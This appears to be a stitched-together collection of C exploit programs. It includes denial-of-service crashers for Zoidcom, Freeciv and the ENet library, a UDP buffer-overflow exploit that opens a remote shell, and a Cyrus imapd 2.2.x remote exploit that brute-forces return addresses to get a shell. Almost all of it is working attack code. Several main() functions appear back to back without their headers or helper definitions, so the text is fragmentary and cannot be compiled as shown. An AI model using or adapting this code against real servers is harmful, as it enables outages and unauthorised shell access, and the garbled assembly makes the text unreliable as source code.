printf("- server waits for %d bytes but we send a partial header\n", HEADSZ);
tmp %= HEADSZ;
if(tmp <= 0) tmp = 1;
SEND(buff, tmp);
fputs(" Server and connected clients should be freezed, press RETURN to stop the attack\n", stdout);
fgetc(stdin);
close(sd);
return(0);
} else {
if(attack == 4) {
yh->type = 0x1d;
} else if(attack == 5) {
yh->type = 0x22;
} else if(attack == 6) {
yh->type = 0x24;
} else if(attack == 7) {
yh->type = 0x28;
}
memset(buff + HEADSZ, 0xff, CRASHSZ);
yh->size = CRASHSZ;
printf("- send crash data with type 0x%08lx\n", yh->type);
}
SEND(buff, yh->size + HEADSZ);
fputs("- check server status\n", stdout);
if(!timeout(sd)) {
if(recv(sd, buff, BUFFSZ, 0) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
} else {
fputs("\nNo reply from the server, it is probably not vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
int main(int argc, char *argv[]) {
unsigned char buffrecv[BUFFSZ],
buffsend[sizeof(BOF1) + 64],
challenge[16],
bug,
*bofstr,
*stri,
*strf;
struct sockaddr_in peer;
int sd,
err,
rlen,
bufflen,
proto;
unsigned long offset;
setbuf(stdout, NULL);
if(argc < 2) {
printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT);
exit(1);
}
printf("OK team, follow my command.\n");
srand(time(NULL));
bofstr=BOF1;
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(atoi(argv[2]));
// offset=strtoul(argv[3],NULL,16);
peer.sin_family = AF_INET;
rlen = sizeof(peer);
offset=0x0804AE93; // call eax
printf("Using offset 0x%08x...\n",offset);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
/* GET INFORMATIONS */
err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
proto = getproto(buffrecv);
showinfostring(buffrecv, err);
/* GET CHALLENGE NUMBER */
err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
stri = strchr(buffrecv, 0x20);
if(!stri) stri = buffrecv;
strf = strchr(stri + 1, 0x20);
if(!strf) strf = buffrecv + err;
*strf = 0x00;
strncpy(challenge, stri, 16);
printf("Challenge: %s\n", challenge);
bufflen = snprintf(buffsend,
sizeof(BOF1) + 64,
bofstr,
proto,
challenge,
(long)(rand() << 1) + (rand() & 0xf), /* 31bit */
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF);
if(bufflen < 0) {
fputs("\nError: cannot allocate buffer in memory\n", stdout);
exit(1);
}
printf("Sending deadly packet ... stand by\n");
err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nResult: The remote server IS vulnerable!!!\n", stdout);
exec_sh(connect_sh(argv[1]));
return(0);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
printf("Connect: %s\n", buffrecv + 5);
close(sd);
fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i;
u16 port = PORT;
u8 buff[16];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Zoidcom <= 0.6.7 crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
// the following is a classical join packet
memcpy(buff,
"\xec\x03\x00\x00\x00\x68\xc0\xff\xe9\x00\x80\x07\x00\x64\x00\x01", 16);
buff[8] = 0x69;
printf("- send malicious packet 0x%02x\n", buff[8]);
for(i = 0; i < 2; i++) {
if(sendto(sd, buff, 16, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
sleep(0);
}
sleep(ONESEC);
buff[8] = 0xa9;
printf("- send malicious packet 0x%02x\n", buff[8]);
for(i = 0; i < 2; i++) {
if(sendto(sd, buff, 16, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
sleep(0);
}
close(sd);
printf("- the server should have been crashed, check it
manually\n");
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
u_int boomsz;
int sd,
i;
u_short port = PORT;
u_char buff[6];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
srand(time(NULL));
setbuf(stdout, NULL);
fputs("\n"
"Freeciv <= 2.0.7 jumbo malloc crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");
boomsz = 6 + (rand() * 1234);
for(;;) {
if(!boomsz) boomsz++;
if(boomsz > 0) boomsz = -boomsz;
if((u_int)((boomsz - 6) * 100) > 0x7fffffff) break;
boomsz *= 1234; // more than 2 gigabytes, I want to be sure
}
*(u_short *)buff = JUMBO_SIZE;
*(u_int *)(buff + 2) = htonl(boomsz);
// int compressed_size = whole_packet_len - header_size; // header_size = 6
// long int decompressed_size = 100 * compressed_size;
printf("- send BOOM data (try to allocate %u bytes on the remote system)\n",
(u_int)(ntohl(*(u_int *)(buff + 2)) - 6) * 100);
if(send(sd, buff, 6, 0)
< 0) std_err();
printf("- wait some seconds:\n");
for(i = 3; i >= 0; i--) {
printf("%3d\r", i);
sleep(ONESEC);
}
close(sd);
printf(
"- the server should be crashed or freezed, check it manually\n"
" if it's still online retry again with this tool or the server is patched\n"
"\n");
return(0);
}
int main(int argc, char **argv){
char *payload = NULL, *hostn = NULL, buffer[1024], *ptr;
int i, first, sock, opt, target = 0, port = 143,
shell_port = atoi(SHELL_PORT), sleeps = 1,
p_size=10000, ret_bf_start = RET_BF_START,
ret_bf_end = RET_BF_END, vulncheck = 1;
fd_set fds;
struct sockaddr_in addr;
printf("[!] Cyrus imapd 2.2.4 - 2.2.8 remote exploit by crash-x / unl0ck\n");
if (argc < 2)
usage(argv[0]);
while ((opt = getopt (argc, argv, "h:p:t:s:P:S:E:vV")) != -1){
switch (opt){
case 'h':
hostn = optarg;
break;
case 'p':
port = atoi(optarg);
if(port > 65535 || port < 1){
printf("[-] Port %d is invalid\n",port);
return 1;
}
break;
case 't':
target = atoi(optarg);
for(i = 0; targets[i].platform; i++);
if(target >= i && target != 1337){
printf("[-] Wtf are you trying to target?\n");
usage(argv[0]);
}
break;
case 'S':
ret_bf_start = strtoul(optarg,NULL,0);
if(!ret_bf_start){
printf("[-] Wtf thats not a valid bruteforce start address!\n");
usage(argv[0]);
}
break;
case 'E':
ret_bf_end = strtoul(optarg,NULL,0);
if(!ret_bf_end){
printf("[-] Wtf thats not a valid bruteforce end address!\n");
usage(argv[0]);
}
break;
case 's':
sleeps = atoi(optarg);
break;
case 'P':
p_size = atoi(optarg);
if(p_size < 1000){
printf("[-] Its a bad idea to have a payload with less than 1000 bytes :)\n");
return 1;
}
break;
case 'v':
vulncheck = 2;
break;
case 'V':
vulncheck = 0;
break;
default:
usage(argv[0]);
}
}
if(hostn == NULL)
usage(argv[0]);
if(payload == NULL){
if(!(payload = malloc(p_size))){
printf("[-] Wasnt able to allocate space for the payload!\n");
return 1;
}
}
resolv(&addr, hostn);
if(vulncheck == 2){
vulnchck(addr, port);
return 1;
}
else if(vulncheck == 1)
vulnchck(addr, port);
if(target != 1337){
ret_bf_start = targets[target].retloc;
ret_bf_end = targets[target].retloc+5;
printf ("[!] Targeting %s\n", targets[target].platform);
} else
printf("[!] Starting bruteforce attack!\n");
for(i = 0, first = 1; ret_bf_start < ret_bf_end; i++, first++){
if((sock = conn(addr, port)) == -1){
if(first != 1)
printf("\n");
printf("[-] Connecting failed!\n");
break;
}
if(i == 4)
ret_bf_start += (p_size - (p_size/10));
else
ret_bf_start++;
gen_payload(payload, p_size, ret_bf_start, 1);
status(ret_bf_start, ret_bf_start + (p_size - (p_size/10)),
ret_bf_start + (p_size - (p_size/10/2)));
sockprintf(sock, "%s\r\n", payload);
if(i == 4){
get_shell(addr, shell_port, sleeps);
i = 0;
}
if(ret_bf_start >= ret_bf_end)
printf("[-]\n");
close(sock);
}
printf("[-] Exploit failed!\n");
return 1;
}
int main(int argc, char *argv[]) {
ENetProtocolHeader *header;
ENetProtocol *command;
u_int chall,
stime;
int sd,
len,
attack;
u_char buff[8192];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"ENet library <= Jul 2005 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> <port> [commandLength(0x%08x)]\n"
"\n"
"Attack:\n"
" 1 = invalid memory access\n"
" 2 = allocation abort with fragment\n"
"\n"
" Default port examples: Cube on 28765, Sauerbraten on 28785\n"
" commandLength is the big value to use for both the attacks, read my advisory\n"
"\n", argv[0], commandLength);
exit(1);
}
header = (ENetProtocolHeader *)buff;
command = (ENetProtocol *)(buff + sizeof(ENetProtocolHeader));
attack = atoi(argv[1]);
if(argc > 4) commandLength = get_num(argv[4]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(atoi(argv[3]));
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port));
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
stime = MYRAND;
chall = ~stime;
if(attack == 1) {
printf("- send malformed packet\n");
header->peerID = htons(0xffff);
header->flags = 0;
header->commandCount = 1 + (MYRAND % 255); // major than 1
header->sentTime = stime;
header->challenge = chall;
command->header.command = ENET_PROTOCOL_COMMAND_CONNECT;
command->header.channelID = 0xff;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(commandLength); // BOOM
command->header.reliableSequenceNumber = htonl(1);
command->connect.outgoingPeerID = htons(0);
command->connect.mtu = htons(1400);
command->connect.windowSize = htonl(32768);
command->connect.channelCount = htonl(ENET_PROTOCOL_MINIMUM_CHANNEL_COUNT);
command->connect.incomingBandwidth = htonl(0);
command->connect.outgoingBandwidth = htonl(0);
command->connect.packetThrottleInterval = htonl(5000);
command->connect.packetThrottleAcceleration = htonl(2);
command->connect.packetThrottleDeceleration = htonl(2);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + sizeof(ENetProtocolConnect),
buff, sizeof(buff), 0);
if(len < 0) {
printf("- no reply from the server, it should be already crashed\n");
}
} else if(attack == 2) {
printf("- start connection to host\n");
printf(" send connect\n");
header->peerID = htons(0xffff);
header->flags = 0;
header->commandCount = 1;
header->sentTime = stime;
header->challenge = chall;
command->header.command = ENET_PROTOCOL_COMMAND_CONNECT;
command->header.channelID = 0xff;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolConnect));
command->header.reliableSequenceNumber = htonl(1);
command->connect.outgoingPeerID = htons(0);
command->connect.mtu = htons(1400);
command->connect.windowSize = htonl(32768);
command->connect.channelCount = htonl(2);
command->connect.incomingBandwidth = htonl(0);
command->connect.outgoingBandwidth = htonl(0);
command->connect.packetThrottleInterval = htonl(5000);
command->connect.packetThrottleAcceleration = htonl(2);
command->connect.packetThrottleDeceleration = htonl(2);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 1);
printf(" send ack\n");
/* SRV header->peerID */
header->flags = 0;
header->commandCount = 1;
stime = ntohl(header->sentTime); // useless???
header->sentTime = htonl(stime + 1);
/* SRV header->challenge */
command->header.command = ENET_PROTOCOL_COMMAND_ACKNOWLEDGE;
/* SRV command->header.channelID */
command->header.flags = 0;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolAcknowledge));
command->header.reliableSequenceNumber = htonl(1);
/* SRV command->acknowledge.receivedReliableSequenceNumber */
command->acknowledge.receivedSentTime = htonl(stime);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 1);
printf(" send malformed fragment\n");
len = 10 + (MYRAND % 1000);
/* SRV header->peerID */
header->flags = 0;
header->commandCount = 1;
header->sentTime = htonl(ntohl(header->sentTime) + 1);
/* SRV header->challenge */
command->header.command = ENET_PROTOCOL_COMMAND_SEND_FRAGMENT;
command->header.channelID = 0;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolSendFragment) + len);
command->header.reliableSequenceNumber = htonl(1);
command->sendFragment.startSequenceNumber = htonl(1);
command->sendFragment.fragmentCount = htonl(2 + (MYRAND % 2000));
command->sendFragment.fragmentNumber = htonl(0);
command->sendFragment.totalLength = htonl(commandLength);
command->sendFragment.fragmentOffset = htonl(0);
memset(command + sizeof(ENetProtocolSendFragment), len, len); // first len is for random
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 0);
if(len < 0) {
printf("- no reply from the server, it should be already crashed\n");
}
}
close(sd);
printf("- check server:\n");
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
stime = MYRAND;
chall = ~stime;
header->peerID = htons(0xffff);
header->flags = 0;
header->commandCount = 1;
header->sentTime = stime;
header->challenge = chall;
command->header.command = ENET_PROTOCOL_COMMAND_CONNECT;
command->header.channelID = 0xff;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolConnect));
command->header.reliableSequenceNumber = htonl(1);
command->connect.outgoingPeerID = htons(0);
command->connect.mtu = htons(1400);
command->connect.windowSize = htonl(32768);
command->connect.channelCount = htonl(ENET_PROTOCOL_MINIMUM_CHANNEL_COUNT);
command->connect.incomingBandwidth = htonl(0);
command->connect.outgoingBandwidth = htonl(0);
command->connect.packetThrottleInterval = htonl(5000);
command->connect.packetThrottleAcceleration = htonl(2);
command->connect.packetThrottleDeceleration = htonl(2);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 0);
if(len < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server does not seem vulnerable\n\n");
}
close(sd);
return(0);
}
